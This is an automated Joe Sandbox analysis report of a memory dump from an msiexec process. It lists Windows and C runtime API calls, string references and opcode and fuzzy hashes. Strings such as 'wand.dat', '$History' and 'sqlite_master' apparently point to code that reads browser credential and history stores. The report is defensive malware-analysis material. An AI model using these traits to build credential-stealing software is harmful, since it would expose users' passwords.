                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _memicmpwcslen
                                                              • String ID: @@@@$History
                                                              • API String ID: 1872909662-685208920
                                                              • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                              • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                              • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                              • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                              APIs
                                                              • memset.MSVCRT ref: 004100FB
                                                              • memset.MSVCRT ref: 00410112
                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                              • _snwprintf.MSVCRT ref: 00410141
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf_wcslwrwcscpy
                                                              • String ID: </%s>
                                                              • API String ID: 3400436232-259020660
                                                              • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                              • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                              • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                              • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                              APIs
                                                              • memset.MSVCRT ref: 0040D58D
                                                              • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                              • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ChildEnumTextWindowWindowsmemset
                                                              • String ID: caption
                                                              • API String ID: 1523050162-4135340389
                                                              • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                              • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                              • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                              • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                              APIs
                                                                • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                              • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                              • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                              • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                              • String ID: MS Sans Serif
                                                              • API String ID: 210187428-168460110
                                                              • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                              • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                              • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                              • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ClassName_wcsicmpmemset
                                                              • String ID: edit
                                                              • API String ID: 2747424523-2167791130
                                                              • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                              • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                              • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                              • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                              • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                              • API String ID: 3150196962-1506664499
                                                              • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                              • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                              • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                              • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                              APIs
                                                              • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                              • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                              • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                              • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                              • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memcmp
                                                              • String ID:
                                                              • API String ID: 3384217055-0
                                                              • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                              • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                              • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                              • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$memcpy
                                                              • String ID:
                                                              • API String ID: 368790112-0
                                                              • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                              • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                              • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                              • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                              APIs
                                                                • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                              • GetMenu.USER32(?), ref: 00410F8D
                                                              • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                              • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                              • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                              • String ID:
                                                              • API String ID: 1889144086-0
                                                              • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                              • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                              • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                              • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                              APIs
                                                              • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                              • GetLastError.KERNEL32 ref: 0041810A
                                                              • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateErrorHandleLastMappingView
                                                              • String ID:
                                                              • API String ID: 1661045500-0
                                                              • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                              • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                              • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                              • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                              APIs
                                                                • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                              • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                              Strings
                                                              • sqlite_altertab_%s, xrefs: 0042EC4C
                                                              • virtual tables may not be altered, xrefs: 0042EBD2
                                                              • Cannot add a column to a view, xrefs: 0042EBE8
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                              • API String ID: 1297977491-2063813899
                                                              • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                              • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                              • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                              • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                              APIs
                                                              • memset.MSVCRT ref: 0040560C
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                              • String ID: *.*$dat$wand.dat
                                                              • API String ID: 2618321458-1828844352
                                                              • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                              • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                              • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                              • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                              APIs
                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                              • wcslen.MSVCRT ref: 00410C74
                                                              • _wtoi.MSVCRT(?), ref: 00410C80
                                                              • _wcsicmp.MSVCRT ref: 00410CCE
                                                              • _wcsicmp.MSVCRT ref: 00410CDF
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                              • String ID:
                                                              • API String ID: 1549203181-0
                                                              • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                              • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                              • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                              • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                              APIs
                                                              • memset.MSVCRT ref: 00412057
                                                                • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                              • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                              • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                              • GetKeyState.USER32(00000010), ref: 0041210D
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                              • String ID:
                                                              • API String ID: 3550944819-0
                                                              • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                              • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                              • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                              • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                              APIs
                                                              • free.MSVCRT ref: 0040F561
                                                              • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                              • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$free
                                                              • String ID: g4@
                                                              • API String ID: 2888793982-2133833424
                                                              • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                              • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                              • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                              • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                              APIs
                                                              • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                              • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                              • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: @
                                                              • API String ID: 3510742995-2766056989
                                                              • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                              • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                              • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                              • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                              • memset.MSVCRT ref: 0040AF18
                                                              • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@memcpymemset
                                                              • String ID:
                                                              • API String ID: 1865533344-0
                                                              • Opcode ID: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                              • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                              • Opcode Fuzzy Hash: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                              • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                              APIs
                                                              • memset.MSVCRT ref: 004144E7
                                                                • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                              • memset.MSVCRT ref: 0041451A
                                                              • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                              • String ID:
                                                              • API String ID: 1127616056-0
                                                              • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                              • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                              • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                              • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                              APIs
                                                              • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                              • memset.MSVCRT ref: 0042FED3
                                                              • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: sqlite_master
                                                              • API String ID: 438689982-3163232059
                                                              • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                              • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                              • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                              • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                              APIs
                                                              • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                              • wcscpy.MSVCRT ref: 00414DF3
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: BrowseFolderFromListMallocPathwcscpy
                                                              • String ID:
                                                              • API String ID: 3917621476-0
                                                              • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                              • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                              • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                              • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                              APIs
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                              • _snwprintf.MSVCRT ref: 00410FE1
                                                              • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                              • _snwprintf.MSVCRT ref: 0041100C
                                                              • wcscat.MSVCRT ref: 0041101F
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                              • String ID:
                                                              • API String ID: 822687973-0
                                                              • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                              • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                              • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                              • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                              • malloc.MSVCRT ref: 00417459
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                                              • free.MSVCRT ref: 0041747F
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$freemalloc
                                                              • String ID:
                                                              • API String ID: 2605342592-0
                                                              • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                              • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                              • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                              • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                              • RegisterClassW.USER32(?), ref: 00412428
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                              • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: HandleModule$ClassCreateRegisterWindow
                                                              • String ID:
                                                              • API String ID: 2678498856-0
                                                              • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
